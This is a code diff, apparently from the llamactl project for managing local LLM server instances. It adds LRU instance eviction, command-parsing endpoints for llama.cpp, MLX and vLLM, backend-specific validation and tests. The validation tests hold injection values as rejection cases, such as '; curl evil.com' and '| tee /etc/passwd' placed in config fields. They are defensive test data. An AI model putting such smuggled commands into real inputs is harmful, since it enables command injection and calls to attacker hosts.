LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}

View File

@@ -1,6 +1,10 @@
package manager
import "log"
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
@@ -24,3 +28,37 @@ func (im *instanceManager) checkAllTimeouts() {
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances without idle timeout
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}

332
pkg/manager/timeout_test.go Normal file
View File

@@ -0,0 +1,332 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
MLX: config.BackendSettings{Command: "mlx_lm.server"},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(backendConfig, cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -5,6 +5,10 @@ import (
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
@@ -47,12 +51,12 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/help [get]
// @Router /backends/llama-cpp/help [get]
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help")
@@ -69,12 +73,12 @@ func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/version [get]
// @Router /backends/llama-cpp/version [get]
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version")
@@ -91,12 +95,12 @@ func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/devices [get]
// @Router /backends/llama-cpp/devices [get]
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices")
@@ -272,6 +276,12 @@ func (h *Handler) StartInstance() http.HandlerFunc {
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -451,7 +461,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return
}
if !inst.Running {
if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
@@ -541,7 +551,7 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
// @Accept json
// @Produces json
// @Success 200 "OpenAI response"
// @Failure 400 {string} string "Invalid request body or model name"
// @Failure 400 {string} string "Invalid request body or instance name"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/ [post]
func (h *Handler) OpenAIProxy() http.HandlerFunc {
@@ -554,7 +564,7 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
}
r.Body.Close()
// Parse the body to extract model name
// Parse the body to extract instance name
var requestBody map[string]any
if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
@@ -563,35 +573,48 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
modelName, ok := requestBody["model"].(string)
if !ok || modelName == "" {
http.Error(w, "Model name is required", http.StatusBadRequest)
http.Error(w, "Instance name is required", http.StatusBadRequest)
return
}
// Route to the appropriate inst based on model name
// Route to the appropriate inst based on instance name
inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !inst.Running {
if inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart {
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
} else {
if !inst.IsRunning() {
allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
}
proxy, err := inst.GetProxy()
@@ -610,3 +633,163 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
proxy.ServeHTTP(w, r)
}
}
// ParseCommandRequest represents the request body for command parsing
type ParseCommandRequest struct {
Command string `json:"command"`
}
// ParseLlamaCommand godoc
// @Summary Parse llama-server command
// @Description Parses a llama-server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Failure 500 {object} map[string]string "Internal Server Error"
// @Router /backends/llama-cpp/parse-command [post]
func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: llamaOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseMlxCommand godoc
// @Summary Parse mlx_lm.server command
// @Description Parses MLX-LM server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/mlx/parse-command [post]
func (h *Handler) ParseMlxCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
mlxOptions, err := mlx.ParseMlxCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
// Currently only support mlx_lm backend type
backendType := backends.BackendTypeMlxLm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
MlxServerOptions: mlxOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseVllmCommand godoc
// @Summary Parse vllm serve command
// @Description Parses a vLLM serve command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/vllm/parse-command [post]
func (h *Handler) ParseVllmCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
vllmOptions, err := vllm.ParseVllmCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
backendType := backends.BackendTypeVllm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
VllmServerOptions: vllmOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}

View File

@@ -44,10 +44,20 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Get("/version", handler.VersionHandler()) // Get server version
r.Route("/server", func(r chi.Router) {
r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.LlamaServerListDevicesHandler())
// Backend-specific endpoints
r.Route("/backends", func(r chi.Router) {
r.Route("/llama-cpp", func(r chi.Router) {
r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.LlamaServerListDevicesHandler())
r.Post("/parse-command", handler.ParseLlamaCommand())
})
r.Route("/mlx", func(r chi.Router) {
r.Post("/parse-command", handler.ParseMlxCommand())
})
r.Route("/vllm", func(r chi.Router) {
r.Post("/parse-command", handler.ParseVllmCommand())
})
})
// Instance management endpoints

View File

@@ -2,6 +2,7 @@ package validation
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect"
"regexp"
@@ -33,20 +34,76 @@ func validateStringForInjection(value string) error {
return nil
}
// ValidateInstanceOptions performs minimal security validation
// ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
case backends.BackendTypeMlxLm:
return validateMlxOptions(options)
case backends.BackendTypeVllm:
return validateVllmOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil {
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation - only check for reasonable ranges
if options.Port < 0 || options.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range"))
// Basic network validation for port
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
}
return nil
}
// validateMlxOptions validates MLX backend specific options
func validateMlxOptions(options *instance.CreateInstanceOptions) error {
if options.MlxServerOptions == nil {
return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
}
if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
}
return nil
}
// validateVllmOptions validates vLLM backend specific options
func validateVllmOptions(options *instance.CreateInstanceOptions) error {
if options.VllmServerOptions == nil {
return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
}
return nil

View File

@@ -1,6 +1,7 @@
package validation_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
@@ -83,7 +84,8 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port,
},
}
@@ -136,7 +138,8 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value,
},
}
@@ -173,7 +176,8 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array,
},
}
@@ -196,7 +200,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "injection in model field",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -206,7 +211,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "injection in log file",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -216,7 +222,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "all safe fields",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -244,7 +251,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,

100
webui/package-lock.json generated
View File

@@ -19,6 +19,7 @@
"lucide-react": "^0.525.0",
"react": "^19.1.0",
"react-dom": "^19.1.0",
"sonner": "^2.0.7",
"tailwind-merge": "^3.3.1",
"tailwindcss": "^4.1.11",
"zod": "^4.0.5"
@@ -42,7 +43,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.0.5",
"vite": "^7.1.5",
"vitest": "^3.2.4"
}
},
